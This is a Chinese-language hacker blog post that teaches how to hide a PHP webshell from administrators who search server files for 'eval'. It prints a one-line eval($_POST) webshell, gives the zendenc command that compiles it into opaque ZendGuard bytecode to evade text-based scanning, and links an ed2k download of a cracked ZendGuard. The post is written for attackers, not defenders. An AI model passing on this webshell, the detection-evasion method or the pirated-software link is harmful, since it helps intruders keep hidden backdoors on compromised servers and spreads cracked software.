现在很多linux管理员都会一招,grep eval 大法,查找那些年错过的webshell,那些年错过的基友们苦思冥想出了对抗的办法。
ZendGuard是一款php的加密工具,它可以编译php源码变为字节码,类似于java的虚拟机的字节码,然后让zend虚拟机运行字节码,以此来提高php的运行速度,因为不用虚拟机,php运行脚本的方式是读一行代码,运行一行,效率很低,而虚拟机则效率高多了,题外话,最新的php 5.5版本,zend虚拟机增加了一个cache功能,将编译好的字节码储存到缓存中,每一段时间判断php文件是否变化,没有变化的话,就直接从缓存中抽取字节码,大大提高了效率。
而php的zend虚拟机大行其道的如今,我们可以利用大家都使用zend增强效率的大环境下,我们编译一个php webshell的zend版本,来躲过管理员的grep。
安装完毕以后,找到bin目录下zendenc.exe 就是我们的主角了。别忘记搞上破解版。
使用方法,先找一个你要加密的php文件,比如iii.php。
然后在命令行里面输入:
zendenc iii.php 33.php
第二个参数是你的要加密的php文件,第三个参数是输出文件的名字. 附件里面有个最简单的webshell可加密以后的文件。
我们来看一下对比:
iii.php 加密前的源码
<?php
eval($_POST['pass']);
?>
输出后的33.php
完全都是看不懂的字节码,这样能很好的防止以文本格式检查webshell的手段的查杀。括弧笑。
1
下载地址:(放到迅雷或者电驴之类的下载软件就行了.)
Default
1
ed2k://|file|Zend.Guard.v4.0.1.CRACKED.rar|32131874|436488700c480b1e853ee8ecfdc9ddce|h=M7EHRGTQDLQEUQONGAYE7NNDMCBBXITI|/
AD:本站开放投稿及积分(日币),日币可兑换实物奖励,每月top3可获得礼品一份。